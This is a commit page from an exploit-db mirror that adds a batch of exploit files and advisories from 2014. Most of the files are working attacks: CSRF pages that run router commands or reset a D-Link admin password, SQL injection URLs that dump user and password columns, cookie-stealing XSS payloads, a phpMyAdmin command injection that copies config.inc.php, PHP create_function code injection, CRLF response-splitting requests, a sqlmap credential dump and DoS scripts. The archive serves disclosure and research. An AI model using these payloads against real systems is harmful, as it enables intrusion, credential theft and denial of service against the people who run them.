bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_22_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-22 04:31:38 +00:00
parent 595a23d463
commit 81eda5a35c
41 changed files with 1487 additions and 210 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

460
files.csv
View file

File diff suppressed because it is too large Load diff

7
platforms/asp/webapps/32394.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31242/info
Sama Educational Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/Error.asp?Message=XSS

11
platforms/asp/webapps/32401.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31298/info
rgb72 WCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
rgb72 WCMS 1.0b is vulnerable; other versions may also be affected.
http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,3,f_user,f_password,6,7,8+from+upass%00
http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,f_user,4,5,f_password,7,8,9,10,11,12,13+from+upass%00

11
platforms/asp/webapps/32412.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31338/info
Omnicom Content Platform is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
To exploit this issue an attacker may need administrative privileges to the affected application.
Exploiting the issue may allow the attacker to obtain sensitive information that could aid in further attacks.
Omnicom Content Platform 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/ocp/admin/fileKontrola/browser.asp?root=/

231
platforms/hardware/remote/32374.txt Executable file
View file

@ -0,0 +1,231 @@
Document Title:
===============
Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1229
Release Date:
=============
2014-03-19
Vulnerability Laboratory ID (VL-ID):
====================================
1229
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
Why carry a physical USB drive around wherever you go, cluttering up your key ring? Instead, this simple, convenient app converts your
iOS device into a wireless hard drive that works over WiFi! Simple. Powerful. Convenient. Wireless Drive: One of those apps you`ll end
up using all the time! Features:
- Transfer files without limitation
- Support files in any format and size
- Use WiFi or iTunes File Sharing to transfer files between your iOS device and computer
- Perfect app for transporting large collections of video
- Use it to transfer work documents from office to home, simple and easily
(Copy of the Homepage: https://itunes.apple.com/de/app/wireless-drive-transfer-share/id569832333 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official OnDemandWorld Wireless Drive v1.1.0 mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
OnDemandWorld
Product: Wireless Drive - Transfer & Share Files over WiFi 1.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official OnDemandWorld Wireless Drive v1.1.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload file` module. Remote attackers are able to inject own files with malicious
`filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file dir list. The security risk of the local file include web vulnerability
is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.7(+)|(-)6.8.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload file
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Upload > Menu File Dir List (http://localhost:4096)
1.2
A local command/path injection web vulnerabilities has been discovered in the official OnDemandWorld Wireless Drive v1.1.0 iOS mobile web-application.
A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `[foldername]` value of the wifi file dir list module. Local attackers are able to inject own malicious
system specific commands or path value requests in the vulnerable foldername value. The injection requires a active sync with the wifi app stored folders.
The execution of the local command inject via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of
the local command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] Sync
Vulnerable Parameter(s):
[+] foldername (path value)
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction and with low privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Upload File > filename [Sub Dir]
<tr><td rowspan="3"><img src="Blank.jpg" height="50px" align="middle" width="50px"></td>
<td><a href="5FCAF1DE-6D23-463B-ABE0-FFB0191DF038/A77E7236-BFEA-4C38-97B4-00CC483C3D04.
?filename=<../[LOCAL FILE INCLUDE VULNERABILITY!]>" alt="<../[LOCAL FILE INCLUDE VULNERABILITY!]>"><strong><../[LOCAL FILE INCLUDE VULNERABILITY!]"></strong></a></td></tr>
<tr><td> 0.5 KB</td></tr><tr><td> 2014-03-19 11:55:51</td></tr><tr><td rowspan="3"><img src="PNG.jpg" align="middle" width="50px" height="50px"/></td>
<td><a href="5FCAF1DE-6D23-463B-ABE0-FFB0191DF038/48123658-2770-400F-9D04-31EBF5142634.png?filename=1.png" alt="1.png"><strong>1.png</strong></a></td></tr>
<tr><td> 0.5 KB</td></tr><tr><td> 2014-03-19 11:53:05</td></tr><tr><td rowspan="3"><img src="JPG.jpg" align="middle" width="50px" height="50px"/></td>
<td><a href="5FCAF1DE-6D23-463B-ABE0-FFB0191DF038/C3C427D4-7B42-49A3-9A68-D7B4881CAB2C.jpg?filename=Sample.jpg" alt="Sample.jpg"><strong>Sample.jpg</strong></a></td></tr>
<tr><td> 175.2 KB</td></tr><tr><td> 2013-02-23 18:48:42</td></tr></table>
</p><form action="" method="post" enctype="multipart/form-data" accept-charset="utf-8" name="form1" id="form1"><label>Upload file: <input type="file"
name="upload1" id="upload1" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></strong></a></td></tr>
--- PoC Session Logs [POST] ---
POST http://localhost:4096/5FCAF1DE-6D23-463B-ABE0-FFB0191DF038 Load Flags[LOAD_FROM_CACHE ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
Request Header:
Host[localhost:4096]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64;
rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer
[http://localhost:4096/5FCAF1DE-6D23-463B-ABE0-FFB0191DF038]
POST-Daten:
POST_DATA[-----------------------------23750323325183
Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]_*"
Content-Type: image/png
1.2
The command inject vulnerability can be exploited by local attackers with physical device access or low privileged user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Sync > foldername [Index]
<tbody><tr><td rowspan="3"><img src="folder.jpg" height="50px" align="middle" width="50px"></td>
<td><a href="./[LOCAL COMMAND INJECT VULNERABILITY VIA FOLDERNAME]-" alt="./[LOCAL COMMAND INJECT VULNERABILITY VIA FOLDERNAME]-"><strong>
./[LOCAL COMMAND INJECT VULNERABILITY VIA FOLDERNAME]-</strong></a></td></tr><tr><td>Folder</td></tr><tr><td>2014-03-19</td></tr>
</tbody>
Solution - Fix & Patch:
=======================
1.1
The local command inject web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Encode also the filename index listing to prevent execution of malicious commands, injection of script codes or file include attacks.
1.2
The local command inject web vulnerability can be patched by a secure parse and restriction of the rename and foldername value in the wifi app.
Encode also the output index list were the folders will become visible after the sync.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the wifi exchange interface is estimated as high(+).
1.2
The local command inject vulnerability in the foldername value via sync is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

9
platforms/hardware/remote/32390.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31218/info
The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability.
Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.
The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected.
<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #1 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="asdf.submit();"> <form name=asdf method="post" action="http://example.com/level/15/exec/-"> <input type=hidden name=command value="show privilege"> <input type=hidden name=command_url value="/level/15/exec/-"> </body> </html>

9
platforms/hardware/remote/32391.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31218/info
The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability.
Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.
The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected.
<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="fdsa.submit();"> <form name=fdsa method="post" action="http://example.com/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx"> <input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-"> </body> </html>

77
platforms/hardware/webapps/32385.txt Executable file
View file

@ -0,0 +1,77 @@
####################################################################################
# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00
CSRF Vulnerability
# Google Dork: N/A
# Date: 20/03/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router
# Software Link: N/A
# Hardware Version:E4
# Firmware Version:5.10
# Tested on: Router Web Server
# CVE : N/A
###################################################################################
Cross Site Request Forgery
This Modem's Web Application , suffers from Cross-site request forgery
through which attacker can manipulate user data via sending him malicious
craft url.
The Modems's Application not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password:
In the POC the IP address in the POST is the modems IP address.
<html>
<body>
<form id ="poc" action="http://192.168.0.1/goform/formSetPassword"
method="POST">
<input type="hidden" name="settingsChanged" value="1" />
<input type="hidden" name="config.login_name" value="admin" />
<input type="hidden" name="config.password" value="YWRtaW4A" />
<input type="hidden"
name="config.web_server_allow_graphics_auth"
value="false" />
<input type="hidden"
name="config.web_server_allow_wan_http" value="false" />
<input type="hidden"
name="config.web_server_wan_port_http" value="8080" />
<input type="hidden"
name="config.wan_web_ingress_filter_name" value="" />
<input type="hidden" name="wan_ingress_filter_details"
value="" />
</form>
</body>
<script type="text/javascript">
document.getElementById("poc").submit();
</script>
</html>
______________________
*Dhruv Shah* *aka Snypter*
Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>

65
platforms/linux/dos/32384.txt Executable file
View file

@ -0,0 +1,65 @@
source: http://www.securityfocus.com/bid/31201/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.
This issue affects versions prior to Linux kernel 2.6.22.2.
[global]
bs=8k
iodepth=1024
iodepth_batch=60
randrepeat=1
size=1m
directory=/home/oracle
numjobs=20
[job1]
ioengine=sync
bs=1k
direct=1
rw=randread
filename=file1:file2
[job2]
ioengine=libaio
rw=randwrite
direct=1
filename=file1:file2
[job3]
bs=1k
ioengine=posixaio
rw=randwrite
direct=1
filename=file1:file2
[job4]
ioengine=splice
direct=1
rw=randwrite
filename=file1:file2
[job5]
bs=1k
ioengine=sync
rw=randread
filename=file1:file2
[job7]
ioengine=libaio
rw=randwrite
filename=file1:file2
[job8]
ioengine=posixaio
rw=randwrite
filename=file1:file2
[job9]
ioengine=splice
rw=randwrite
filename=file1:file2
[job10]
ioengine=mmap
rw=randwrite
bs=1k
filename=file1:file2
[job11]
ioengine=mmap
rw=randwrite
direct=1
filename=file1:file2

21
platforms/linux/remote/32277.txt Executable file
View file

@ -0,0 +1,21 @@
nginx <= 1.4.0 exploit for CVE-2013-2028
by sorbo
Fri Jul 12 14:52:45 PDT 2013
./brop.rb 127.0.0.1
for remote hosts:
./frag.sh ip
./brop.rb ip
rm state.bin when changing host (or relaunching nginx with canaries)
scan.py will find servers, reading IPs from ips.txt
This is a generic exploit for 64-bit nginx which uses a new attack technique (BROP) that does not rely on a particular target binary. It will work on any distro and even compiled from source installations.
Exploit: http://www.exploit-db.com/sploits/32277.tgz

25
platforms/multiple/dos/32381.js Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/31155/info
Avant Browser is prone to an integer-overflow vulnerability that occurs in the JavaScript engine.
An attacker can exploit this issue by enticing an unsuspecting victim to view a malicious site.
Successfully exploiting this issue may allow attackers to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Avant Browser 11.7 Build 9 is vulnerable; other versions may also be affected.
NOTE: This vulnerability may be related to the issue described in BID 14917 (Mozilla Browser/Firefox JavaScript Engine Integer Overflow Vulnerability).
<script>
var s=String.fromCharCode(257);
var a=""; var b="";
for(i=0;i<1024;i++){a=a+s;}
for(i=0;i<1024;i++){b=b+a;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += b;
alert("0x90");
var Fuck=escape(ov);
alert("0x90 !");
alert(Fuck);
</script>

18
platforms/multiple/dos/32386.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/31205/info
Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
The following applications using the engine are vulnerable:
Unreal Tournament 3.1.3
Unreal Tournament 2003
Unreal Tournament 2004
Dead Man's Hand
Pariah
WarPath
Postal 2
Shadow Ops
http://www.exploit-db.com/sploits/32386.zip

9
platforms/multiple/dos/32400.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31294/info
Foxmail Email Client is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Foxmail Email Client 6.5 is vulnerable; other versions may also be affected.
<html> <body> <P>Author:friddy QQ:568623 <P>Result:Program Crash <BR> <A href="mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com">ClickME</a> >Clickme</A> </body> </html>

9
platforms/multiple/remote/32382.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31178/info
Accellion File Transfer Appliance is prone to an open-email-relay vulnerability.
An attacker could exploit this issue by constructing a script that would send unsolicited spam to an unrestricted amount of email addresses from a forged email address.
This issue affects Accellion File Transfer Appliance prior to FTA_7_0_189.
https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> Content-Type: application/x-www-form-urlencoded Content-Length: 131 POST DATA: description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam% 40victim_domain.com&submit=Soumettre+le+rapport

19
platforms/php/remote/32416.php Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/31398/info
PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.
An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.
This weakness is reported in PHP 5.2.6; other versions may also be affected.
<?php
# call as test.php?sort_by="]);}phpinfo();/*
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';
usort($databases, create_function('$a, $b', $sort_function));
?>

12
platforms/php/remote/32417.php Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/31398/info
PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.
An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.
This weakness is reported in PHP 5.2.6; other versions may also be affected.
<?php
$funstring = 'return -1 * var_dump($a[""]);}phpinfo();/*"]';
$unused = create_function('',$funstring);
?>

61
platforms/php/webapps/32239.txt Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: SQL injection in Trixbox All Versions
# Date: 13/03/2014
# Exploit Author: Sc4nX
# Email : Sec744[at]yahoo.com - r1z[at]hackermail.com
# Software Link: http://trixbox.org/downloads
# Tested on: Linux / Win 7
Example : (Grab users / password hashes from ampusers)?
root@sc4nx# python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10
[*] starting at 07:53:52
[07:53:52] [INFO] resuming back-end DBMS 'mysql'
[07:53:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: bookId
? ? Type: boolean-based blind
? ? Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
? ? Payload: bookId=1' RLIKE (SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0x28 END)) AND 'AIdK'='AIdK
? ? Type: AND/OR time-based blind
? ? Title: MySQL < 5.0.12 AND time-based blind (heavy query)
? ? Payload: bookId=1' AND 3086=BENCHMARK(5000000,MD5(0x454a5a64)) AND 'qjLM'='qjLM
---
[07:53:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5
[07:53:52] [INFO] fetching columns 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 2
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: username
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: password
[07:53:52] [INFO] fetching entries of column(s) 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] fetching number of column(s) 'password, username' entries for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 1
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: passw0rd
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 5
[07:53:52] [INFO] resumed: admin
[07:53:52] [INFO] analyzing table dump for possible password hashes
Database: asterisk
Table: ampusers
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin ? ?| passw0rd |
+----------+----------+
===================================================================================
GZ : Dr.Hacker (Doksh) - CodeZero - All Memmbers Sec4ever.com?
The End :P

174
platforms/php/webapps/32375.txt Executable file
View file

@ -0,0 +1,174 @@
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: storm@sicherheit-online.org
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)
###########################################################################################################
# XSS vulnerability #######################################################################################
Under certain circumstances, an attacker can trick a user to enter a specially crafted
URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that
theoretically can be used to gain unauthorized access to a user account or collect
sensitive information of this user.
SAMPLE: -------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]
---------------------------------------------------------------------------------------
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001
###########################################################################################################
###########################################################################################################
###########################################################################################################
# Multiple CRLF injection / HTTP response splitting #######################################################
Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to
enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability
that theoretically can be used to poison cache, gain unauthorized access to a user account or collect
sensitive information of this user.
A possible exploit by passing such a mal-formed URI could lead to:
- return of a blank page or a PHP error (depending on one's server configuration)
- set unsolicited browser cookies
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE:
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002
Vulnerability details:
###########################################################################################################
# 1 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: anid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=start
&aid=1
&am=1
&anid=%0d%0a%20[INJECT:INJECT]
&cl=start
&fnc=tobasket
&lang=0
&pgNr=0
&stoken=1
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 2 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: cnid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=%0d%0a%20[INJECTED:INJECTED]
&fnc=tobasket
&lang=0
&listtype=list
&panid=
&parentid=1
&stoken=1
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 3 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: listtype
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=0
&fnc=tobasket
&lang=0
&listtype=%0d%0a%20[INJECTED:INJECTED]
&panid=
&parentid=0
&stoken=0
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners.
A thanks to the developers who have responded relatively quickly.
Cheers!
//sToRm

9
platforms/php/webapps/32383.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31188/info
phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
This issue affects versions prior to phpMyAdmin 2.11.9.1.
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

9
platforms/php/webapps/32387.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31210/info
Quick.Cms.Lite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Quick.Cms.Lite 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?"><script>alert(document.cookie)</script><"

7
platforms/php/webapps/32388.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31214/info
The Cars & Vehicle script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
www.example.com/Script/page.php?lnkid=-1/**/UNION/**/SELECT/**/1,1,1,1,concat_ws(user(),version(),database()),1/*

9
platforms/php/webapps/32389.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31216/info
Quick.Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Quick.Cart 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?"><script>alert(document.cookie)</script><"

256
platforms/php/webapps/32392.pl Executable file
View file
